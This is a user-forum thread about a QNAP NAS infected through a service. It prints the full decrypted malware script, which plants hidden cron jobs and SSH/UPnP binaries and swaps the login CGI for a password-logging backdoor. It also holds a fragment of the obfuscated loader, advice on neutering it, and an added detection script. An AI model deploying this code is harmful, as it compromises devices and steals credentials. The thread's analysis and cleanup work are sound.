Strange folders and cronjobs
- dolbyman
- Guru
- Posts: 35272
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: Strange folders and cronjobs
8TB external drives are cheap..should be plenty of space for movies
- benzo83
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
Not too cheap, 300 euro :/
dolbyman wrote: 8TB external drives are cheap..should be plenty of space for movies
- Don
- Guru
- Posts: 12289
- Joined: Thu Jan 03, 2008 4:56 am
- Location: Long Island, New York
Re: Strange folders and cronjobs
No, QNAP employees cannot answer you. This is a community forum and not a QNAP support channel. If you want an answer from QNAP then you need to open a ticket.
benzo83 wrote: Can I safely remove these files? Can any QNAP employee answer me?
Use the forum search feature before posting.
Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NMVe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
- Mousetick
- Experience counts
- Posts: 1081
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
This is a nasty piece of sh.itware you've got there.
I decrypted the autorun.sh (see further below).
I can't spend the time to read and understand what all the script code does; I'm not paid for that, it's QNAP's job, and the tight code gives me a headache. But here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs
So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network: not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.
Decrypted autorun.sh:
#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; }
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
EOF
test "$fgrep" || fgrep=grep
test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"
test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"
test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }
cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }
chmod 755 "${bdir}/.${ipath}/${crons}.sh"
if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0"
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi
for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"
grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && {
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat`
test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}
. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }
true;
}
#]
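The traces this script leaves are concrete enough to check for. The triage script below is an added example, not part of Mousetick's post or any QNAP tool; it assumes the QTS layout the script itself relies on (/etc/config, /share/<volume>, /home/httpd/cgi-bin) and takes the filesystem root as an argument so it can also run against a mounted copy of the NAS volumes.

```shell
#!/bin/sh
# Triage helper added as an example (not from the forum post or from QNAP).
# It looks for the traces the decrypted autorun.sh above leaves on a QTS
# filesystem: pass "/" on the NAS itself, or the mount point of a copy of
# the volumes for offline triage. The paths and patterns come from that
# script; the ROOT argument and the output format are this example's own.

# Cron persistence: the script inserts a line of the form
#   "<0|10|20|30> * * * * <basedir>/.<hiddendir>/<name>.sh >/dev/null 2>&1"
# (sometimes with a space before /dev/null). An hourly job whose command
# lives in a dot-directory is the tell. Hits need a look: QPKG packages
# under .qpkg can match too, and the script timestomps the crontab with
# "touch -cr", so mtimes cannot be trusted to tell the two apart.
find_hidden_cron_jobs() {
    [ -f "$1" ] || return 0
    grep -nE '^[0-9]+ \* \* \* \* +/[^ ]*/\.[^ /]+/[^ ]+\.sh +> ?/dev/null 2>&1' "$1" \
        | sed 's/^/cron: /'
}

# Login hook: the script keeps the genuine authLogin.cgi as QTSauthLogin.cgi
# and drops a shell wrapper in its place that logs POST bodies containing
# "pwd", then exec's the saved original so the login still works.
check_login_cgi() {
    cgidir="$1"
    [ -f "$cgidir/QTSauthLogin.cgi" ] &&
        echo "cgi: saved copy of original login CGI at $cgidir/QTSauthLogin.cgi"
    [ -f "$cgidir/authLogin.cgi" ] && grep -q 'QTSauthLogin.cgi' "$cgidir/authLogin.cgi" &&
        echo "cgi: authLogin.cgi is a wrapper that hands off to QTSauthLogin.cgi"
    return 0
}

# Credential log: the wrapper appends "<remote addr>:<post body>" to
# <basedir>/.log/.cgi_log, so each line is one captured login request.
check_cred_log() {
    log="$1/.log/.cgi_log"
    [ -f "$log" ] || return 0
    echo "creds: $log holds $(grep -c . "$log") captured login request(s)"
}

# Default credentials: the script only installs the login hook when admin
# still has the default password, which it recognises by this exact hash.
check_default_admin() {
    [ -f "$1" ] || return 0
    grep -q 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' "$1" &&
        echo "shadow: admin account still has the default password"
    return 0
}

# Dropped files: .BOOT_TIME run markers next to the share base, the
# .temp.*/.mount.* scratch directories and the hard-coded fallback name .jbbxQob.
find_dropped_files() {
    for d in "$1/share" "$1/mnt/HDA_ROOT" "$1/tmp"; do
        [ -d "$d" ] || continue
        find "$d" -maxdepth 3 \( -name '.BOOT_TIME' -o -name '.temp.*' \
            -o -name '.mount.*' -o -name '.jbbxQob' \) 2>/dev/null | sed 's/^/file: /'
    done
}

# Run every check against ROOT; prints one line per finding, nothing when clean.
scan_nas() {
    root="${1:-/}"
    find_hidden_cron_jobs "$root/etc/config/crontab"
    find_hidden_cron_jobs "$root/mnt/HDA_ROOT/.config/crontab"
    check_login_cgi "$root/home/httpd/cgi-bin"
    check_default_admin "$root/etc/shadow"
    for share in "$root"/share/*; do
        [ -d "$share" ] && check_cred_log "$share"
    done
    find_dropped_files "$root"
    return 0
}

if [ $# -gt 0 ]; then
    scan_nas "$1"
fi
```

Run it as `sh triage.sh /` on the NAS or `sh triage.sh /mnt/nas-copy` against a mounted image; any output line is a finding to investigate.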
- benzo83
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
Thank you.
Mousetick wrote: This is a nasty piece of sh.itware you've got there.
The router is an ISP router, the NAS is a QNAP NAS, all software is up to date, and the malware vehicle is one of the NAS services. I exposed the NAS to the network with 2FA, a strong password etc. etc., but it was not enough.
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Do you have Music Station installed and enabled?
benzo83 wrote: Not too cheap, 300 euro :/
dolbyman wrote: 8TB external drives are cheap..should be plenty of space for movies
QNAP support suspects it is caused by a vulnerability in Music Station and suggested turning it off for now.
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Hi Mousetick,
Mousetick wrote: This is a nasty piece of sh.itware you've got there.
"${bdir}/.${ipath}/${crons}.sh" if [ -f "${confdir}/crontab" ]; then test "$RANDOM" || RANDOM=12499 test $(( $RANDOM & 1 )) = 0 && space=' ' || space='' cronmins="$(( $RANDOM % 4 ))" test ! "$cronmins" -eq 0 && cronmins="${cronmins}0" $fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; } fi for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done chmod 755 "${bdir}/.${ipath}/${sshbin}" chmod 755 "${bdir}/.${ipath}/${upnpbin}" grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && { ! test -d "${bdir}/.log" && mkdir "${bdir}/.log" ! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh POSTDATA="" test "x${REQUEST_METHOD}" = xPOST && { case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` test ! 
-z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac; $REMOTE_ADDR:$POSTDATA EOF } test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && { case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0 } if ! test -z "$POSTDATA"; then exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc $POSTDATA V4KLDmYwvc else exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi fi exit 0' > /home/httpd/cgi-bin/_authLogin.cgi test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi } . "${bdir}/.${ipath}/${crons}.sh" cd "${sdir}" rm -rf "${tdir}" test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & } true; } #]
Thanks for the reply! Can you tell us how to "decrypt" the shell script? I'd like to look into mine and see if I can find anything myself.
I don't get the point why to disconnect from LAN?
-
- Easy as a breeze
- Posts: 372
- Joined: Fri Apr 08, 2016 6:42 pm
Re: Strange folders and cronjobs
Also another question, is the following cron job safe:
*/5 * * * * /mnt/ext/opt/apache/bin/php /mnt/ext/opt/qdesk/www/public/index.php cli watchdog woof
-
- Starting out
- Posts: 28
- Joined: Wed Nov 18, 2015 4:50 am
Re: Strange folders and cronjobs
somy1982 wrote: Do you have music station installed and enabled?
Unfortunately I do.
QNAP support suspects it is caused by vulnerability in music station and suggested to turn it off for now.
- Don
- Guru
- Posts: 12289
- Joined: Thu Jan 03, 2008 4:56 am
- Location: Long Island, New York
Re: Strange folders and cronjobs
You disconnect from the LAN to protect other devices on the LAN from being compromised by the NAS infection.
Use the forum search feature before posting.
Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.
NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NMVe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
-
- Experience counts
- Posts: 1081
- Joined: Thu Aug 24, 2017 10:28 pm
Re: Strange folders and cronjobs
somy1982 wrote: Can you tell us how to "decrypt" the shell script? I'd like to look into mine and see if I can find anything myself.
The only way to decrypt the script is to execute it because it is self-decrypting. Since executing it to completion is harmful, it needs to be surgically edited to keep the decryption part but disable the harmful part. That part changes from script to script so it's not easy to give general instructions. Also some scripts are encrypted with multiple passes, so the neutering process needs to be applied several times.
I greatly discourage you try to do this if you don't understand fully what I just said and what follows.
Example: autorun.sh posted by benzo83. Look for the note "<<<<<<<<<<============ DANGEROUS PART HERE" (added by me).
Code: Select all
#!/bin/sh
WDsKwcX=${NfPe}tr${TOtnQoPZlj}$XtvYzUmXi$'';XlvTWbP=$HwyETG$""${BOQDRIBofeJvZ}\\$KcLJmW$""${mBgBLqNugLIeP};WHJRnC=${AfESPMztIUpwo}${ayhM}${ifMZuHyfid}${XlvTWbP}1${ORdB}3${naPAXdYJve}3$nXrwvwbgB$'';HAFPgiL=${IQcueXfGmyiCy}${oUpr}${yVUyYguMwM}${XlvTWbP}0${cZew}5${NvQVndODqz}5$pDkAgrLTF$'';TQzLfG=${tfBBVkrxivfHq}${HJzN}${lDvZlgOBlx}${XlvTWbP}1${ybgg}3${oMdRZIuYWi}4$vcMuhGGuT$'';$WDsKwcX 'Cmi`BLh}Xfrg&vH+AjZKS'$WHJRnC't>]IV)YkTqz*QyPG{aN!OMR<cd '$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E' << "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
E>/fJ%/Cc|mBnkq\]x[d=em$$mjlMXT&VRmjYFOf+Oc*CIN&ABwsVmjB+z\A!M+\F)[`+&RABwszI}mj-#uVK[fG&}k%nmj}} V-cD&wsmrL-62r)JWVJ%mjOX)R+&wsVOmjlzx`kPAuAUk&)BmjNNI%tz&wsmjO!)I++`R&(kWCBws)%CBmjTn=cqz-PRU)c&mj*MZ\FB bWzqxW&mjJ"TBefqA&Vwsmj+kKV&)mrL-6BrCBVmjq-OMPTn&mjT()}N`Cu*&wsmjNYC]xc&B\mrL-61rWmj=xJOY*ZlWM&ws(mjK`n(bQKcY&kWCBwsmjx
...remainder omitted for brevity...
Code: Select all
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg" | sh${rzhPJHObGUkhj}${PZYG} <<<<<<<<<<================= DANGEROUS PART HERE
Code: Select all
'$TQzLfG'U;'"'"'Dso|eW%"=Fn#xbpEl($J'$HAFPgiL'w\nu' 's$*Ve'$TQzLfG'>mNb'"'"'=}<(Rp{gM+GI!WotuJajDckF|qZ&TPXrBy'$HAFPgiL'hKwvU'$WHJRnC']S )\nHlnAQLdzOY`#Cf"ix;%E'<< "FDdIirg"
Code: Select all
#!/bin/sh
